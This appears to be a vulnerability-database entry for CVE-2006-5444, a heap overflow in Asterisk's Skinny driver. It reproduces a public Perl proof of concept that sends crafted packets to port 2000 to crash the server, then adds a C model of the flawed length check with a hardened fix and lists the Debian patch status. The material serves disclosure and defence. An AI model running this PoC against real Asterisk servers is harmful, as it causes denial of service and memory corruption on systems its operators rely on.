CVE-2006-5444


Description

Integer overflow in the get_input function in the Skinny channel driver (chan_skinny.c) in Asterisk 1.0.x before 1.0.12 and 1.2.x before 1.2.13, as used by Cisco SCCP phones, allows remote attackers to execute arbitrary code via a certain dlen value that passes a signed integer comparison and leads to a heap-based buffer overflow.



Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-2597 · type: dos · platform: multiple · verified · perl · 1 KB
Noam Rathaus · 2006-10-19

Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)

Source: Exploit-DB (perl)
#!/usr/bin/perl
# Beyond Security
# Copyright Noam Rathaus <noamr@beyondsecurity.com>

#
# The following proof of concept causes chan_skinny to crash in different locations, due to
# memory corruption as well as double free calls; this is based on the finding of
# Security-Assessment.com, and proves that the vulnerability is indeed exploitable and there...
#

use strict;
use warnings;
use IO::Socket;

# Usage: perl poc.pl [target] [variant 1-4]   (defaults: 127.0.0.1, variant 4)
my $target  = $ARGV[0] || "127.0.0.1";
my $variant = $ARGV[1] || 4;

# Every packet starts with the 4-byte little-endian SCCP data length (dlen) that chan_skinny
# later hands to memcpy() as letohl(dlen)+8; the crash observed for each variant is noted beside it.
my @packets = (
    # 1: dlen = 0x41414141 -> *** glibc detected *** malloc(): memory corruption: 0x08175830 ***
    "A" x 1000,
    # 2: dlen = 0xE030 -> *** glibc detected *** double free or corruption (!prev): 0x08184348 ***
    "\x30\xE0\x00\x00" . "\x00\x00\x00\x00" . ("A" x 1000),
    # 3: dlen = 0x3E5 (997) -> *** glibc detected *** double free or corruption (out): 0x08171740 ***
    "\xE5\x03\x00\x00" . ("A" x 996),
    # 4: dlen = 0xFFFFFFF0 (-16 as a signed int) -> Program received signal SIGSEGV, Segmentation fault.
    #    [Switching to Thread -1494127696 (LWP 9909)]
    #    0xa76264cb in skinny_session (data=0x8183ee8) at chan_skinny.c:2896
    #    2896  memcpy(req, s->inbuf, letohl(*(int*)(s->inbuf))+8);
    "\xF0\xFF\xFF\xFF" . ("A" x 996),
);

die "variant must be between 1 and " . scalar(@packets) . "\n"
    if $variant < 1 || $variant > @packets;

my $remote = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => 2000)
    or die "cannot connect to skinny daemon on $target:2000";

print $remote $packets[$variant - 1];
close $remote;

# milw0rm.com [2006-10-19]
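The following is an added example, not Asterisk's own code and not part of the PoC above. It models the length handling that the CVE text and the PoC's gdb line imply: the 4-byte little-endian SCCP dlen is read through an int, 8 is added in signed arithmetic, and the result becomes memcpy()'s size_t. It evaluates the four PoC headers against that pattern and against a hardened check that keeps the length unsigned and bounds it before any arithmetic. The 1000-byte buffer size, the function names and the hardened check are assumptions for illustration.

```c
/*
 * Added example (not Asterisk's code): models the copy-length computation that the
 * PoC's gdb output shows, memcpy(req, s->inbuf, letohl(*(int*)(s->inbuf))+8),
 * beside a hardened form. Buffer size and names are assumptions.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SKINNY_MAX_PACKET 1000u   /* assumed size of the req/inbuf heap buffers */

/* Decode the little-endian dlen field from the first 4 wire bytes (what letohl() yields). */
static uint32_t sccp_dlen(const unsigned char *hdr)
{
    return (uint32_t)hdr[0] | ((uint32_t)hdr[1] << 8) |
           ((uint32_t)hdr[2] << 16) | ((uint32_t)hdr[3] << 24);
}

/* Vulnerable pattern: the byte count memcpy() receives for this header.
 * The uint32 -> int conversion wraps (two's complement on every Asterisk target),
 * so 0xFFFFFFF0 becomes -16, -16 + 8 = -8, and (size_t)-8 is SIZE_MAX - 7.
 * (dlen + 8 is itself undefined for dlen within 8 of INT_MAX; not exercised here.) */
size_t vulnerable_copy_len(const unsigned char *hdr)
{
    int dlen = (int)sccp_dlen(hdr);
    return (size_t)(dlen + 8);
}

/* Does that copy run past a SKINNY_MAX_PACKET-byte heap buffer? */
bool vulnerable_overflows(const unsigned char *hdr)
{
    return vulnerable_copy_len(hdr) > SKINNY_MAX_PACKET;
}

/* Hardened form: keep dlen unsigned, bound it against the real buffer before any
 * arithmetic, and derive the copy length only once the bound holds. */
bool hardened_copy_len(const unsigned char *hdr, size_t bufsize, size_t *out)
{
    uint32_t dlen = sccp_dlen(hdr);
    if (bufsize < 8 || dlen > bufsize - 8)   /* bufsize - 8 cannot underflow here */
        return false;
    *out = (size_t)dlen + 8;
    return true;
}

/* Copy length the hardened check accepts for SKINNY_MAX_PACKET, or 0 when rejected. */
size_t hardened_len_or_zero(const unsigned char *hdr)
{
    size_t n = 0;
    return hardened_copy_len(hdr, SKINNY_MAX_PACKET, &n) ? n : 0;
}

/* Constructed test vectors: the dlen headers of the four PoC packets, plus one sane header. */
const unsigned char POC_HDR_AAAA[4]  = {0x41, 0x41, 0x41, 0x41};  /* "A"x1000: dlen 0x41414141 */
const unsigned char POC_HDR_E030[4]  = {0x30, 0xE0, 0x00, 0x00};  /* dlen 57392                */
const unsigned char POC_HDR_03E5[4]  = {0xE5, 0x03, 0x00, 0x00};  /* dlen 997: 5 bytes too many */
const unsigned char POC_HDR_FFF0[4]  = {0xF0, 0xFF, 0xFF, 0xFF};  /* dlen -16 as a signed int  */
const unsigned char SANE_HDR_03E0[4] = {0xE0, 0x03, 0x00, 0x00};  /* dlen 992: exactly fits    */

int main(void)
{
    const unsigned char *hdrs[] = {POC_HDR_AAAA, POC_HDR_E030, POC_HDR_03E5,
                                   POC_HDR_FFF0, SANE_HDR_03E0};
    for (size_t i = 0; i < sizeof hdrs / sizeof hdrs[0]; i++) {
        printf("dlen=0x%08x  vulnerable memcpy len=%zu  overflow=%d  hardened accepts=%zu\n",
               sccp_dlen(hdrs[i]), vulnerable_copy_len(hdrs[i]),
               (int)vulnerable_overflows(hdrs[i]), hardened_len_or_zero(hdrs[i]));
    }
    return 0;
}
```

Variant 3 (dlen 997) is the instructive one: it is a perfectly ordinary positive length, yet 997+8 exceeds a 1000-byte buffer by 5 bytes, which is what the "double free or corruption" glibc message in the PoC reflects; variant 4 passes any signed "too large" comparison because -16 is not large, and then turns into a multi-gigabyte memcpy.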

OS impact

Debian: fixed in 2 releases

  Version    Status   Fixed in
  sid        Fixed    1:1.2.13~dfsg-1
  bullseye   Fixed    1:1.2.13~dfsg-1
